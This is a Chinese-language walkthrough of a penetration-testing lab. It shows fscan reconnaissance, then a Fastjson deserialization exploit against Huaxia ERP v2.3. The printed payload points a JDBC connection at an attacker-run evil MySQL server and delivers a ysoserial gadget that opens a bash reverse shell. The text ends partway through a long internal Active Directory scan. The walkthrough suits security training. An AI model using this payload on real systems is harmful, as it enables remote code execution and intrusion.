靶标介绍:
Exchange 是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 Flag,分布于不同的靶机。 *注意:该靶场只有4个flag,如果提交完4个flag后仍未攻克成功,请关闭环境提交反馈。
FLAG1
首先用fscan信息收集一手
1 .\fscan.exe -h 39.98.127.105 -p 1-65535
2
3 ___ _
4 / _ \ ___ ___ _ __ __ _ ___| | __
5 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
6/ /_\\_____\__ \ (__| | | (_| | (__| <
7\____/ |___/\___|_| \__,_|\___|_|\_\
8 fscan version: 1.8.1
9start infoscan
10(icmp) Target 39.98.127.105 is alive
11[*] Icmp alive hosts len is: 1
1239.98.127.105:80 open
1339.98.127.105:22 open
1439.98.127.105:8000 open
15[*] alive ports len is: 3
16start vulscan
17[*] WebTitle:http://39.98.127.105 code:200 len:19813 title:lumia
18[*] WebTitle:http://39.98.127.105:8000 code:302 len:0 title:None 跳转url: http://39.98.127.105:8000/login.html
19[*] WebTitle:http://39.98.127.105:8000/login.html code:200 len:5662 title:Lumia ERP
20已完成 3/3
21[*] 扫描结束,耗时: 5m26.1641278s
80端口是一个介绍产品的网站
8000端口应该是网站的后台
看到后台可以注册用户,我们注册一个
成功进入后台
华夏ERP v2.3存在一处fastjson反序列化漏洞
Java 代码审计之华夏 ERP CMS v2.3 - FreeBuf网络安全行业门户
Fastjson版本是 1.2.55
构造dns请求验证一下
{"@type":"java.net.Inet4Address","val":"ysgbayuskh.iyhc.eu.org"}
验证漏洞
这里我们可以通过evil-mysql-server和ysoserial构造恶意mysql服务打jdbc
./evil-mysql-server -addr 3366 -java java -ysoserial ysoserial-all.jar
exp
{
"name": {
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.jdbc.JDBC4Connection",
"hostToConnectTo": "vpsIP地址",
"portToConnectTo": 3366,
"info": {
"user": "yso_CommonsCollections6_bash -c {echo,base64编码后的命令}|{base64,-d}|{bash,-i}",
"password": "pass",
"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"NUM_HOSTS": "1"
}
}
成功弹shell
有root权限,直接读flag
1root@iZ8vb6bns5dh59k418a97hZ:/root/flag# cat f*
2cat f*
3 ██ ██ ██ ██ ███████ ███████ ██ ████ ██ ████████
4░░██ ██ ░██ ████ ██░░░░░██ ░██░░░░██ ████ ░██░██ ░██ ██░░░░░░██
5 ░░██ ██ ░██ ██░░██ ██ ░░██░██ ░██ ██░░██ ░██░░██ ░██ ██ ░░
6 ░░███ ░██ ██ ░░██ ░██ ░██░███████ ██ ░░██ ░██ ░░██ ░██░██
7 ██░██ ░██ ██████████░██ ░██░██░░░██ ██████████░██ ░░██░██░██ █████
8 ██ ░░██ ░██░██░░░░░░██░░██ ██ ░██ ░░██ ░██░░░░░░██░██ ░░████░░██ ░░░░██
9 ██ ░░██░██░██ ░██ ░░███████ ░██ ░░██░██ ░██░██ ░░███ ░░████████
10░░ ░░ ░░ ░░ ░░ ░░░░░░░ ░░ ░░ ░░ ░░ ░░ ░░░ ░░░░░░░░
11
12 | | || | /~~\ /\ |\ /|~|~
13 | | ||--|| |/__\ | \/ | |
14 \/ \/ | | \__// \| |_|_
15
16 flag01: flag{f605c397-0df7-4f55-b013-c7e45be124d0}
FLAG2
root@iZ8vb6bns5dh59k418a97hZ:/tmp# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:1c:80:b4 brd ff:ff:ff:ff:ff:ff
inet 172.22.3.12/16 brd 172.22.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe1c:80b4/64 scope link
valid_lft forever preferred_lft forever
传个fscan信息收集一波
1root@iZ8vb6bns5dh59k418a97hZ:/tmp# ./fscan -h 172.22.3.0/24 -eh 172.22.3.12 -p 1-65535
2┌──────────────────────────────────────────────┐
3│ ___ _ │
4│ / _ \ ___ ___ _ __ __ _ ___| | __ │
5│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
6│ / /_\\_____\__ \ (__| | | (_| | (__| < │
7│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
8└──────────────────────────────────────────────┘
9 Fscan Version: 2.0.0
10
11[2025-04-09 00:51:47] [INFO] 暴力破解线程数: 1
12[2025-04-09 00:51:47] [INFO] 开始信息扫描
13[2025-04-09 00:51:47] [INFO] CIDR范围: 172.22.3.0-172.22.3.255
14[2025-04-09 00:51:47] [INFO] 生成IP范围: 172.22.3.0.%!d(string=172.22.3.255) - %!s(MISSING).%!d(MISSING)
15[2025-04-09 00:51:47] [INFO] 解析CIDR 172.22.3.0/24 -> IP范围 172.22.3.0-172.22.3.255
16[2025-04-09 00:51:48] [INFO] 已排除指定主机: 1 个
17[2025-04-09 00:51:48] [INFO] 最终有效主机数量: 255
18[2025-04-09 00:51:48] [INFO] 开始主机扫描
19[2025-04-09 00:51:48] [SUCCESS] 目标 172.22.3.2 存活 (ICMP)
20[2025-04-09 00:51:48] [SUCCESS] 目标 172.22.3.26 存活 (ICMP)
21[2025-04-09 00:51:48] [SUCCESS] 目标 172.22.3.9 存活 (ICMP)
22[2025-04-09 00:51:51] [INFO] 存活主机数量: 3
23[2025-04-09 00:51:51] [INFO] 有效端口数量: 65535
24[2025-04-09 00:51:51] [SUCCESS] 端口开放 172.22.3.9:25
25[2025-04-09 00:51:51] [SUCCESS] 端口开放 172.22.3.2:53
26[2025-04-09 00:51:51] [SUCCESS] 端口开放 172.22.3.9:80
27[2025-04-09 00:51:51] [SUCCESS] 端口开放 172.22.3.2:88
28[2025-04-09 00:51:51] [SUCCESS] 端口开放 172.22.3.9:81
29[2025-04-09 00:51:51] [SUCCESS] 服务识别 172.22.3.9:25 => [smtp] 产品:Microsoft Exchange smtpd 系统:Windows
30[2025-04-09 00:51:51] [SUCCESS] 端口开放 172.22.3.2:135
31[2025-04-09 00:51:52] [SUCCESS] 端口开放 172.22.3.9:135
32[2025-04-09 00:51:52] [SUCCESS] 端口开放 172.22.3.26:139
33[2025-04-09 00:51:52] [SUCCESS] 端口开放 172.22.3.9:139
34[2025-04-09 00:51:52] [SUCCESS] 端口开放 172.22.3.2:139
35[2025-04-09 00:51:52] [SUCCESS] 端口开放 172.22.3.26:135
36[2025-04-09 00:51:55] [SUCCESS] 端口开放 172.22.3.2:389
37[2025-04-09 00:51:55] [SUCCESS] 端口开放 172.22.3.9:445
38[2025-04-09 00:51:55] [SUCCESS] 端口开放 172.22.3.26:445
39[2025-04-09 00:51:55] [SUCCESS] 端口开放 172.22.3.9:444
40[2025-04-09 00:51:55] [SUCCESS] 端口开放 172.22.3.2:445
41[2025-04-09 00:51:55] [SUCCESS] 端口开放 172.22.3.9:443
42[2025-04-09 00:51:56] [SUCCESS] 端口开放 172.22.3.9:465
43[2025-04-09 00:51:56] [SUCCESS] 端口开放 172.22.3.2:464
44[2025-04-09 00:51:56] [SUCCESS] 端口开放 172.22.3.9:477
45[2025-04-09 00:51:56] [SUCCESS] 端口开放 172.22.3.9:476
46[2025-04-09 00:51:56] [SUCCESS] 端口开放 172.22.3.9:475
47[2025-04-09 00:51:56] [SUCCESS] 服务识别 172.22.3.9:465 => [smtp] 产品:Microsoft Exchange smtpd 系统:Windows
48[2025-04-09 00:51:56] [SUCCESS] 服务识别 172.22.3.2:88 =>
49[2025-04-09 00:51:56] [SUCCESS] 服务识别 172.22.3.9:477 => [smtp]
50[2025-04-09 00:51:56] [SUCCESS] 服务识别 172.22.3.9:476 => [smtp]
51[2025-04-09 00:51:56] [SUCCESS] 服务识别 172.22.3.9:475 => [smtp]
52[2025-04-09 00:51:56] [SUCCESS] 端口开放 172.22.3.9:587
53[2025-04-09 00:51:56] [SUCCESS] 端口开放 172.22.3.2:593
54[2025-04-09 00:51:56] [SUCCESS] 端口开放 172.22.3.9:593
55[2025-04-09 00:51:56] [SUCCESS] 服务识别 172.22.3.9:81 => [http]
56[2025-04-09 00:51:56] [SUCCESS] 端口开放 172.22.3.2:636
57[2025-04-09 00:51:56] [SUCCESS] 服务识别 172.22.3.9:587 => [smtp] 产品:Microsoft Exchange smtpd 系统:Windows
58[2025-04-09 00:51:56] [SUCCESS] 端口开放 172.22.3.9:717
59[2025-04-09 00:51:56] [SUCCESS] 服务识别 172.22.3.2:593 => [ncacn_http] 版本:1.0 产品:Microsoft Windows RPC over HTTP 系统:Windows Banner:[ncacn_http/1.0]
60[2025-04-09 00:51:56] [SUCCESS] 服务识别 172.22.3.9:593 => [ncacn_http] 版本:1.0 产品:Microsoft Windows RPC over HTTP 系统:Windows Banner:[ncacn_http/1.0]
61[2025-04-09 00:51:57] [SUCCESS] 服务识别 172.22.3.2:636 =>
62[2025-04-09 00:51:57] [SUCCESS] 端口开放 172.22.3.9:808
63[2025-04-09 00:51:57] [SUCCESS] 端口开放 172.22.3.9:890
64[2025-04-09 00:51:57] [SUCCESS] 服务识别 172.22.3.9:717 => [smtp] 产品:Microsoft Exchange smtpd 系统:Windows
65[2025-04-09 00:51:57] [SUCCESS] 服务识别 172.22.3.26:139 => Banner:[.]
66[2025-04-09 00:51:57] [SUCCESS] 服务识别 172.22.3.9:139 => Banner:[.]
67[2025-04-09 00:51:57] [SUCCESS] 服务识别 172.22.3.2:139 => Banner:[.]
68[2025-04-09 00:51:57] [SUCCESS] 端口开放 172.22.3.9:1801
69[2025-04-09 00:51:57] [SUCCESS] 服务识别 172.22.3.9:80 => [http] 版本:10.0 产品:Microsoft IIS httpd 系统:Windows
70[2025-04-09 00:51:57] [SUCCESS] 端口开放 172.22.3.9:2103
71[2025-04-09 00:51:58] [SUCCESS] 端口开放 172.22.3.9:2107
72[2025-04-09 00:51:58] [SUCCESS] 端口开放 172.22.3.9:2105
73[2025-04-09 00:52:00] [SUCCESS] 服务识别 172.22.3.2:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name
74[2025-04-09 00:52:00] [SUCCESS] 服务识别 172.22.3.9:445 =>
75[2025-04-09 00:52:00] [SUCCESS] 端口开放 172.22.3.9:2525
76[2025-04-09 00:52:00] [SUCCESS] 服务识别 172.22.3.26:445 =>
77[2025-04-09 00:52:00] [SUCCESS] 服务识别 172.22.3.9:2525 => [smtp] 产品:Microsoft Exchange smtpd 系统:Windows
78[2025-04-09 00:52:00] [SUCCESS] 服务识别 172.22.3.2:445 =>
79[2025-04-09 00:52:00] [SUCCESS] 端口开放 172.22.3.2:3268
80[2025-04-09 00:52:01] [SUCCESS] 端口开放 172.22.3.2:3269
81[2025-04-09 00:52:01] [SUCCESS] 服务识别 172.22.3.2:3269 =>
82[2025-04-09 00:52:01] [SUCCESS] 服务识别 172.22.3.2:464 =>
83[2025-04-09 00:52:01] [SUCCESS] 端口开放 172.22.3.2:3389
84[2025-04-09 00:52:01] [SUCCESS] 端口开放 172.22.3.26:3389
85[2025-04-09 00:52:01] [SUCCESS] 端口开放 172.22.3.9:3389
86[2025-04-09 00:52:02] [SUCCESS] 服务识别 172.22.3.9:808 =>
87[2025-04-09 00:52:02] [SUCCESS] 服务识别 172.22.3.9:890 =>
88[2025-04-09 00:52:02] [SUCCESS] 端口开放 172.22.3.9:3800
89[2025-04-09 00:52:02] [SUCCESS] 端口开放 172.22.3.9:3801
90[2025-04-09 00:52:02] [SUCCESS] 端口开放 172.22.3.9:3803
91[2025-04-09 00:52:02] [SUCCESS] 端口开放 172.22.3.9:3823
92[2025-04-09 00:52:02] [SUCCESS] 端口开放 172.22.3.9:3828
93[2025-04-09 00:52:02] [SUCCESS] 端口开放 172.22.3.9:3843
94[2025-04-09 00:52:02] [SUCCESS] 端口开放 172.22.3.9:3863
95[2025-04-09 00:52:02] [SUCCESS] 端口开放 172.22.3.9:3867
96[2025-04-09 00:52:03] [SUCCESS] 端口开放 172.22.3.9:3875
97[2025-04-09 00:52:05] [SUCCESS] 服务识别 172.22.3.2:3268 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name
98[2025-04-09 00:52:06] [SUCCESS] 服务识别 172.22.3.26:3389 =>
99[2025-04-09 00:52:06] [SUCCESS] 端口开放 172.22.3.9:5060
100[2025-04-09 00:52:07] [SUCCESS] 端口开放 172.22.3.9:5062
101[2025-04-09 00:52:07] [SUCCESS] 端口开放 172.22.3.9:5065
102[2025-04-09 00:52:07] [SUCCESS] 服务识别 172.22.3.9:3801 =>
103[2025-04-09 00:52:07] [SUCCESS] 服务识别 172.22.3.9:3803 =>
104[2025-04-09 00:52:07] [SUCCESS] 服务识别 172.22.3.9:1801 =>
105[2025-04-09 00:52:07] [SUCCESS] 服务识别 172.22.3.9:3823 =>
106[2025-04-09 00:52:07] [SUCCESS] 服务识别 172.22.3.9:3828 =>
107[2025-04-09 00:52:07] [SUCCESS] 服务识别 172.22.3.9:3843 =>
108[2025-04-09 00:52:07] [SUCCESS] 服务识别 172.22.3.9:3863 =>
109[2025-04-09 00:52:07] [SUCCESS] 服务识别 172.22.3.9:3867 =>
110[2025-04-09 00:52:07] [SUCCESS] 端口开放 172.22.3.9:6001
111[2025-04-09 00:52:08] [SUCCESS] 服务识别 172.22.3.9:6001 => [ncacn_http] 版本:1.0 产品:Microsoft Windows RPC over HTTP 系统:Windows Banner:[ncacn_http/1.0]
112[2025-04-09 00:52:07] [SUCCESS] 端口开放 172.22.3.9:6027
113[2025-04-09 00:52:07] [SUCCESS] 端口开放 172.22.3.9:6049
114[2025-04-09 00:52:07] [SUCCESS] 端口开放 172.22.3.9:6057
115[2025-04-09 00:52:08] [SUCCESS] 端口开放 172.22.3.9:6081
116[2025-04-09 00:52:08] [SUCCESS] 端口开放 172.22.3.9:6095
117[2025-04-09 00:52:08] [SUCCESS] 端口开放 172.22.3.9:6102
118[2025-04-09 00:52:08] [SUCCESS] 端口开放 172.22.3.9:6119
119[2025-04-09 00:52:08] [SUCCESS] 端口开放 172.22.3.9:6129
120[2025-04-09 00:52:08] [SUCCESS] 端口开放 172.22.3.9:6153
121[2025-04-09 00:52:08] [SUCCESS] 端口开放 172.22.3.9:6193
122[2025-04-09 00:52:09] [SUCCESS] 端口开放 172.22.3.9:6228
123[2025-04-09 00:52:11] [SUCCESS] 端口开放 172.22.3.9:6401
124[2025-04-09 00:52:11] [SUCCESS] 端口开放 172.22.3.9:6405
125[2025-04-09 00:52:11] [SUCCESS] 端口开放 172.22.3.9:6400
126[2025-04-09 00:52:11] [SUCCESS] 端口开放 172.22.3.9:6404
127[2025-04-09 00:52:11] [SUCCESS] 端口开放 172.22.3.9:6430
128[2025-04-09 00:52:11] [SUCCESS] 服务识别 172.22.3.9:5060 =>
129[2025-04-09 00:52:11] [SUCCESS] 端口开放 172.22.3.9:6448
130[2025-04-09 00:52:12] [SUCCESS] 端口开放 172.22.3.9:6449
131[2025-04-09 00:52:12] [SUCCESS] 端口开放 172.22.3.9:6454
132[2025-04-09 00:52:12] [SUCCESS] 端口开放 172.22.3.9:6490
133[2025-04-09 00:52:12] [SUCCESS] 端口开放 172.22.3.9:6492
134[2025-04-09 00:52:12] [SUCCESS] 端口开放 172.22.3.9:6497
135[2025-04-09 00:52:12] [SUCCESS] 服务识别 172.22.3.9:3800 => [http] 版本:2.0 产品:Microsoft HTTPAPI httpd 系统:Windows
136[2025-04-09 00:52:12] [SUCCESS] 端口开放 172.22.3.9:6512
137[2025-04-09 00:52:13] [SUCCESS] 端口开放 172.22.3.9:6514
138[2025-04-09 00:52:13] [SUCCESS] 端口开放 172.22.3.9:6548
139[2025-04-09 00:52:13] [SUCCESS] 端口开放 172.22.3.9:6550
140[2025-04-09 00:52:13] [SUCCESS] 端口开放 172.22.3.9:6560
141[2025-04-09 00:52:13] [SUCCESS] 端口开放 172.22.3.9:6571
142[2025-04-09 00:52:13] [SUCCESS] 端口开放 172.22.3.9:6564
143[2025-04-09 00:52:13] [SUCCESS] 端口开放 172.22.3.9:6570
144[2025-04-09 00:52:13] [SUCCESS] 端口开放 172.22.3.9:6572
145[2025-04-09 00:52:13] [SUCCESS] 端口开放 172.22.3.9:6578
146[2025-04-09 00:52:13] [SUCCESS] 端口开放 172.22.3.9:6590
147[2025-04-09 00:52:14] [SUCCESS] 端口开放 172.22.3.9:6594
148[2025-04-09 00:52:14] [SUCCESS] 端口开放 172.22.3.9:6606
149[2025-04-09 00:52:14] [SUCCESS] 端口开放 172.22.3.9:6616
150[2025-04-09 00:52:14] [SUCCESS] 端口开放 172.22.3.9:6621
151[2025-04-09 00:52:14] [SUCCESS] 端口开放 172.22.3.9:6624
152[2025-04-09 00:52:14] [SUCCESS] 端口开放 172.22.3.9:6642
153[2025-04-09 00:52:14] [SUCCESS] 端口开放 172.22.3.9:6664
154[2025-04-09 00:52:15] [SUCCESS] 端口开放 172.22.3.9:6685
155[2025-04-09 00:52:15] [SUCCESS] 端口开放 172.22.3.9:6690
156[2025-04-09 00:52:15] [SUCCESS] 端口开放 172.22.3.9:6719
157[2025-04-09 00:52:15] [SUCCESS] 端口开放 172.22.3.9:6728
158[2025-04-09 00:52:15] [SUCCESS] 端口开放 172.22.3.9:6741
159[2025-04-09 00:52:15] [SUCCESS] 端口开放 172.22.3.9:6770
160[2025-04-09 00:52:17] [SUCCESS] 服务识别 172.22.3.9:5062 =>
161[2025-04-09 00:52:17] [SUCCESS] 服务识别 172.22.3.9:5065 =>
162[2025-04-09 00:52:17] [SUCCESS] 端口开放 172.22.3.9:6772
163[2025-04-09 00:52:18] [SUCCESS] 端口开放 172.22.3.9:7673
164[2025-04-09 00:52:19] [SUCCESS] 服务识别 172.22.3.9:6664 =>
165[2025-04-09 00:52:20] [SUCCESS] 端口开放 172.22.3.9:8172
166[2025-04-09 00:52:51] [SUCCESS] 服务识别 172.22.3.2:53 =>
167[2025-04-09 00:52:52] [SUCCESS] 端口开放 172.22.3.2:9389
168[2025-04-09 00:52:53] [SUCCESS] 服务识别 172.22.3.9:2103 =>
169[2025-04-09 00:52:53] [SUCCESS] 端口开放 172.22.3.9:9710
170[2025-04-09 00:52:53] [SUCCESS] 服务识别 172.22.3.9:2107 =>
171[2025-04-09 00:52:55] [SUCCESS] 端口开放 172.22.3.9:12393
172[2025-04-09 00:52:55] [SUCCESS] 服务识别 172.22.3.9:444 =>
173[2025-04-09 00:52:56] [SUCCESS] 服务识别 172.22.3.2:135 =>
174[2025-04-09 00:52:57] [SUCCESS] 端口开放 172.22.3.26:15774
175[2025-04-09 00:52:57] [SUCCESS] 服务识别 172.22.3.2:9389 =>
176[2025-04-09 00:52:57] [SUCCESS] 服务识别 172.22.3.9:135 =>
177[2025-04-09 00:52:57] [SUCCESS] 服务识别 172.22.3.26:135 =>
178[2025-04-09 00:52:58] [SUCCESS] 服务识别 172.22.3.9:9710 =>
179[2025-04-09 00:52:58] [SUCCESS] 服务识别 172.22.3.9:3875 =>
180[2025-04-09 00:52:58] [SUCCESS] 服务识别 172.22.3.9:2105 =>
181[2025-04-09 00:53:03] [SUCCESS] 服务识别 172.22.3.9:6027 =>
182[2025-04-09 00:53:03] [SUCCESS] 服务识别 172.22.3.9:6049 =>
183[2025-04-09 00:53:03] [SUCCESS] 服务识别 172.22.3.9:6057 =>
184[2025-04-09 00:53:03] [SUCCESS] 服务识别 172.22.3.9:6081 =>
185[2025-04-09 00:53:03] [SUCCESS] 服务识别 172.22.3.9:6095 =>
186[2025-04-09 00:53:03] [SUCCESS] 服务识别 172.22.3.9:6102 =>
187[2025-04-09 00:53:03] [SUCCESS] 服务识别 172.22.3.9:6119 =>
188[2025-04-09 00:53:03] [SUCCESS] 服务识别 172.22.3.9:6129 =>
189[2025-04-09 00:53:03] [SUCCESS] 服务识别 172.22.3.9:6153 =>
190[2025-04-09 00:53:03] [SUCCESS] 服务识别 172.22.3.9:6193 =>
191[2025-04-09 00:53:04] [SUCCESS] 服务识别 172.22.3.9:6228 =>
192[2025-04-09 00:53:05] [SUCCESS] 服务识别 172.22.3.9:12393 =>
193[2025-04-09 00:53:06] [SUCCESS] 服务识别 172.22.3.9:6401 =>
194[2025-04-09 00:53:06] [SUCCESS] 服务识别 172.22.3.9:6405 =>
195[2025-04-09 00:53:06] [SUCCESS] 服务识别 172.22.3.9:6400 =>
196[2025-04-09 00:53:06] [SUCCESS] 服务识别 172.22.3.2:3389 =>
197[2025-04-09 00:53:06] [SUCCESS] 服务识别 172.22.3.9:6404 =>
198[2025-04-09 00:53:06] [SUCCESS] 服务识别 172.22.3.9:6430 =>
199[2025-04-09 00:53:06] [SUCCESS] 服务识别 172.22.3.9:3389 =>
200[2025-04-09 00:53:07] [SUCCESS] 服务识别 172.22.3.9:6448 =>
201[2025-04-09 00:53:07] [SUCCESS] 服务识别 172.22.3.26:15774 =>
202[2025-04-09 00:53:07] [SUCCESS] 服务识别 172.22.3.9:6449 =>
203[2025-04-09 00:53:07] [SUCCESS] 服务识别 172.22.3.9:6454 =>
204[2025-04-09 00:53:07] [SUCCESS] 服务识别 172.22.3.9:6490 =>
205[2025-04-09 00:53:07] [SUCCESS] 服务识别 172.22.3.9:6492 =>
206[2025-04-09 00:53:07] [SUCCESS] 服务识别 172.22.3.9:6497 =>
207[2025-04-09 00:53:07] [SUCCESS] 服务识别 172.22.3.9:6512 =>
208[2025-04-09 00:53:08] [SUCCESS] 服务识别 172.22.3.9:6514 =>
209[2025-04-09 00:53:08] [SUCCESS] 服务识别 172.22.3.9:6548 =>
210[2025-04-09 00:53:08] [SUCCESS] 服务识别 172.22.3.9:6550 =>
211[2025-04-09 00:53:08] [SUCCESS] 服务识别 172.22.3.9:6571 =>
212[2025-04-09 00:53:08] [SUCCESS] 服务识别 172.22.3.9:6564 =>
213[2025-04-09 00:53:08] [SUCCESS] 服务识别 172.22.3.9:6570 =>
214[2025-04-09 00:53:08] [SUCCESS] 服务识别 172.22.3.9:6572 =>
215[2025-04-09 00:53:08] [SUCCESS] 服务识别 172.22.3.9:6578 =>
216[2025-04-09 00:53:08] [SUCCESS] 服务识别 172.22.3.9:6590 =>
217[2025-04-09 00:53:09] [SUCCESS] 服务识别 172.22.3.9:6594 =>
218[2025-04-09 00:53:09] [SUCCESS] 服务识别 172.22.3.9:6606 =>
219[2025-04-09 00:53:09] [SUCCESS] 服务识别 172.22.3.9:6616 =>
220[2025-04-09 00:53:09] [SUCCESS] 服务识别 172.22.3.9:6621 =>
221[2025-04-09 00:53:09] [SUCCESS] 服务识别 172.22.3.9:6624 =>
222[2025-04-09 00:53:09] [SUCCESS] 服务识别 172.22.3.9:6642 =>
223[2025-04-09 00:53:10] [SUCCESS] 服务识别 172.22.3.9:6685 =>
224[2025-04-09 00:53:10] [SUCCESS] 服务识别 172.22.3.9:6690 =>
225[2025-04-09 00:53:10] [SUCCESS] 服务识别 172.22.3.9:6719 =>
226[2025-04-09 00:53:10] [SUCCESS] 服务识别 172.22.3.9:6728 =>
227[2025-04-09 00:53:10] [SUCCESS] 服务识别 172.22.3.9:6741 =>
228[2025-04-09 00:53:10] [SUCCESS] 服务识别 172.22.3.9:6770 =>
229[2025-04-09 00:53:12] [SUCCESS] 服务识别 172.22.3.9:6772 =>
230[2025-04-09 00:53:13] [SUCCESS] 服务识别 172.22.3.9:7673 =>
231[2025-04-09 00:53:13] [SUCCESS] 服务识别 172.22.3.9:6560 =>
232[2025-04-09 00:53:15] [SUCCESS] 服务识别 172.22.3.9:8172 =>
233[2025-04-09 00:53:20] [SUCCESS] 服务识别 172.22.3.9:443 =>
234[2025-04-09 00:53:31] [SUCCESS] 端口开放 172.22.3.2:47001
235[2025-04-09 00:53:31] [SUCCESS] 端口开放 172.22.3.26:47001
236[2025-04-09 00:53:31] [SUCCESS] 端口开放 172.22.3.9:47001
237[2025-04-09 00:53:36] [SUCCESS] 服务识别 172.22.3.2:47001 => [http]
238[2025-04-09 00:53:36] [SUCCESS] 服务识别 172.22.3.9:47001 => [http]
239[2025-04-09 00:53:36] [SUCCESS] 服务识别 172.22.3.26:47001 => [http]
240[2025-04-09 00:53:38] [SUCCESS] 端口开放 172.22.3.2:49665
241[2025-04-09 00:53:38] [SUCCESS] 端口开放 172.22.3.26:49664
242[2025-04-09 00:53:38] [SUCCESS] 端口开放 172.22.3.2:49667
243[2025-04-09 00:53:38] [SUCCESS] 端口开放 172.22.3.2:49664
244[2025-04-09 00:53:38] [SUCCESS] 端口开放 172.22.3.2:49666
245[2025-04-09 00:53:38] [SUCCESS] 端口开放 172.22.3.26:49667
246[2025-04-09 00:53:38] [SUCCESS] 端口开放 172.22.3.26:49666
247[2025-04-09 00:53:38] [SUCCESS] 端口开放 172.22.3.26:49665
248[2025-04-09 00:53:38] [SUCCESS] 端口开放 172.22.3.26:49668
249[2025-04-09 00:53:38] [SUCCESS] 端口开放 172.22.3.26:49669
250[2025-04-09 00:53:38] [SUCCESS] 端口开放 172.22.3.26:49670
251[2025-04-09 00:53:38] [SUCCESS] 端口开放 172.22.3.2:49671
252[2025-04-09 00:53:38] [SUCCESS] 端口开放 172.22.3.26:49673
253[2025-04-09 00:53:38] [SUCCESS] 端口开放 172.22.3.2:49674
254[2025-04-09 00:53:38] [SUCCESS] 端口开放 172.22.3.2:49675
255[2025-04-09 00:53:38] [SUCCESS] 端口开放 172.22.3.2:49677
256[2025-04-09 00:53:38] [SUCCESS] 端口开放 172.22.3.26:49678
257[2025-04-09 00:53:38] [SUCCESS] 端口开放 172.22.3.2:49684
258[2025-04-09 00:53:38] [SUCCESS] 端口开放 172.22.3.2:49695
259[2025-04-09 00:53:39] [SUCCESS] 服务识别 172.22.3.2:49674 => [ncacn_http] 版本:1.0 产品:Microsoft Windows RPC over HTTP 系统:Windows Banner:[ncacn_http/1.0]
260[2025-04-09 00:53:55] [SUCCESS] 端口开放 172.22.3.2:52352
261[2025-04-09 00:54:33] [SUCCESS] 服务识别 172.22.3.2:49665 =>
262[2025-04-09 00:54:33] [SUCCESS] 服务识别 172.22.3.26:49664 =>
263[2025-04-09 00:54:33] [SUCCESS] 服务识别 172.22.3.2:49667 =>
264[2025-04-09 00:54:33] [SUCCESS] 服务识别 172.22.3.2:49664 =>
265[2025-04-09 00:54:33] [SUCCESS] 服务识别 172.22.3.2:49666 =>
266[2025-04-09 00:54:33] [SUCCESS] 服务识别 172.22.3.26:49667 =>
267[2025-04-09 00:54:33] [SUCCESS] 服务识别 172.22.3.26:49666 =>
268[2025-04-09 00:54:33] [SUCCESS] 服务识别 172.22.3.26:49665 =>
269[2025-04-09 00:54:34] [SUCCESS] 服务识别 172.22.3.26:49668 =>
270[2025-04-09 00:54:34] [SUCCESS] 服务识别 172.22.3.26:49669 =>
271[2025-04-09 00:54:34] [SUCCESS] 服务识别 172.22.3.26:49670 =>
272[2025-04-09 00:54:34] [SUCCESS] 服务识别 172.22.3.2:49671 =>
273[2025-04-09 00:54:34] [SUCCESS] 服务识别 172.22.3.26:49673 =>
274[2025-04-09 00:54:34] [SUCCESS] 服务识别 172.22.3.2:49675 =>
275[2025-04-09 00:54:34] [SUCCESS] 服务识别 172.22.3.2:49677 =>
276[2025-04-09 00:54:34] [SUCCESS] 服务识别 172.22.3.26:49678 =>
277[2025-04-09 00:54:34] [SUCCESS] 服务识别 172.22.3.2:49684 =>
278[2025-04-09 00:54:34] [SUCCESS] 服务识别 172.22.3.2:49695 =>
279[2025-04-09 00:54:46] [SUCCESS] 端口开放 172.22.3.9:64327
280[2025-04-09 00:54:46] [SUCCESS] 端口开放 172.22.3.9:64337
281[2025-04-09 00:54:50] [SUCCESS] 服务识别 172.22.3.2:52352 =>
282[2025-04-09 00:54:51] [SUCCESS] 服务识别 172.22.3.9:64337 =>
283[2025-04-09 00:55:41] [SUCCESS] 服务识别 172.22.3.9:64327 =>
284[2025-04-09 00:55:41] [INFO] 存活端口数量: 130
285[2025-04-09 00:55:41] [INFO] 开始漏洞扫描
286[2025-04-09 00:55:41] [INFO] 加载的插件: findnet, ldap, ms17010, netbios, rdp, smb, smb2, smbghost, smtp, webpoc, webtitle
287[2025-04-09 00:55:41] [SUCCESS] 网站标题 http://172.22.3.9 状态码:403 长度:0 标题:无标题
288[2025-04-09 00:55:41] [SUCCESS] NetInfo 扫描结果
289目标主机: 172.22.3.9
290主机名: XIAORANG-EXC01
291发现的网络接口:
292 IPv4地址:
293 └─ 172.22.3.9
294[2025-04-09 00:55:41] [SUCCESS] NetInfo 扫描结果
295目标主机: 172.22.3.2
296主机名: XIAORANG-WIN16
297发现的网络接口:
298 IPv4地址:
299 └─ 172.22.3.2
300[2025-04-09 00:55:41] [INFO] 系统信息 172.22.3.2 [Windows Server 2016 Datacenter 14393]
301[2025-04-09 00:55:41] [SUCCESS] NetBios 172.22.3.26 XIAORANG\XIAORANG-PC
302[2025-04-09 00:55:41] [SUCCESS] NetBios 172.22.3.2 DC:XIAORANG-WIN16.xiaorang.lab Windows Server 2016 Datacenter 14393
303[2025-04-09 00:55:41] [SUCCESS] 网站标题 http://172.22.3.9:81 状态码:403 长度:1157 标题:403 - 禁止访问: 访问被拒绝。
304[2025-04-09 00:55:41] [SUCCESS] NetInfo 扫描结果
305目标主机: 172.22.3.26
306主机名: XIAORANG-PC
307发现的网络接口:
308 IPv4地址:
